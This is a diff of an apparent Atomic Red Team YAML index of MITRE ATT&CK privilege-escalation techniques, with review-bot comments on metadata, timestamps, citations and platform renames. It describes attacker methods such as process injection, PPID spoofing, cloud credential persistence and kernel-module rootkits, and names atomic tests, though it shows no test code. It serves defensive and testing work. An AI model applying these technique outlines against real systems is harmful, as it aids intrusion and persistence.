Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -41196,8 +41496,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests:
- name: Portable Executable Injection
@@ -41308,7 +41606,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -41336,8 +41634,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests:
- name: Persistence by modifying Windows Terminal profile
@@ -41469,7 +41765,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests:
- name: Named pipe client impersonation
@@ -41613,18 +41908,18 @@ privilege-escalation:
elevation_required: true
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -41634,11 +41929,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -41649,12 +41948,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -41663,6 +41969,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -41671,13 +41978,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -41703,10 +42013,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
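Review bot: Citation style is inconsistent in the new `Lacework AI Resource Hijacking 2024` entry, which puts the title before the publisher (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`) while every other entry in this list leads with the author. If these strings are edited locally, `Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts.` would match the rest; if they are copied verbatim from the ATT&CK STIX, this is one to report upstream rather than fix here.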
@@ -41715,10 +42033,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -41735,9 +42063,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests:
- name: Azure AD Application Hijacking - Service Principal
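Review bot: T1098.001 ends up with no x_mitre_attack_spec_version or x_mitre_modified_by_ref at all: the three `-` lines drop `x_mitre_attack_spec_version: 3.2.0`, `x_mitre_modified_by_ref: identity--c78cb6e5-...` and `spec_version: '2.1'` together, and nothing in this hunk re-adds the first two. Elsewhere in the patch (T1546.001, T1078) those two keys are only moved to a new position, so for T1098.001 either the re-add sits outside the shown context or the generator dropped them. Confirm before merging that the regenerated T1098.001 block still carries both keys.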
@@ -41977,7 +42302,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
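Review bot: the only change in this hunk is dropping `spec_version: '2.1'`, and the same removal recurs in every technique block across the patch. That is a schema change to the emitted index rather than a data refresh, so the PR description should state explicitly that the STIX `spec_version` key is no longer written (and why, e.g. the upstream object no longer carries it), so anyone parsing these indexes for that field knows to stop relying on it.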
@@ -42066,7 +42390,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -42257,7 +42580,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
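Review bot: `modified` goes backwards here, from '2022-05-24T14:00:00.188Z' to '2022-05-03T02:15:42.360Z'. The old value shares the `14:00:00.188Z` time-of-day with the other replaced timestamps in this patch (VDSO Hijacking, Emond, Services File Permissions Weakness, KernelCallbackTable), which suggests the previous values were normalized placeholders and the new ones are the real upstream STIX timestamps. If that is the case, one sentence in the PR description would stop reviewers from reading each regression as a bug; if not, the older date needs an explanation.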
@@ -42282,7 +42605,6 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -42476,7 +42798,7 @@ privilege-escalation:
name: powershell
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -42502,7 +42824,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -42516,7 +42837,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -42543,8 +42863,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
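Review bot: the replacement URL for `Microsoft File Handlers` is a `previous-versions` Visual Studio 2015 extensibility page (`...specifying-file-handlers-for-file-name-extensions?view=vs-2015`), while the citation is used as general documentation of file-extension handlers. Check that this is the intended successor of the retired `bb166549.aspx` page and not just where the old MSDN link happened to redirect; if it is, updating the line to `Retrieved September 12, 2024` is the right way to record the re-verification.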
@@ -42555,7 +42875,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests:
- name: Change Default File Association
@@ -42655,7 +42976,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -42682,7 +43003,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -42722,7 +43042,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -42742,7 +43062,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
@@ -42769,7 +43088,7 @@ privilege-escalation:
elevation_required: true
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -42823,11 +43142,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
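Review bot: T1574.010 keeps `x_mitre_attack_spec_version: 3.1.0` (the context line above the removed `spec_version`) while nearly every other technique in this patch ends up at 3.2.0. If the upstream STIX object really is still at 3.1.0 that is fine, but since the patch otherwise regenerates everything from the same source, a single straggler is worth verifying rather than assuming.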
@@ -42914,9 +43232,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -42929,7 +43247,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
@@ -43363,7 +43680,7 @@ privilege-escalation:
elevation_required: true
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -43399,16 +43716,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
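Review bot: removing `Azure AD`, `Office 365` and `Google Workspace` from `x_mitre_platforms` in favor of `Office Suite` and `Identity Provider` (with `x_mitre_version` 2.6 to 2.7) is consistent with ATT&CK's platform consolidation, but anything downstream that filters or builds per-platform indexes on the old platform names will stop matching T1098 (and T1078, changed the same way further down). Regenerate any such derived indexes in the same change, and say in the PR description whether indexes for the new platform names are introduced or the old ones are retired.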
@@ -43449,7 +43765,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
@@ -44442,138 +44757,137 @@ privilege-escalation:
terraform apply -auto-approve
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
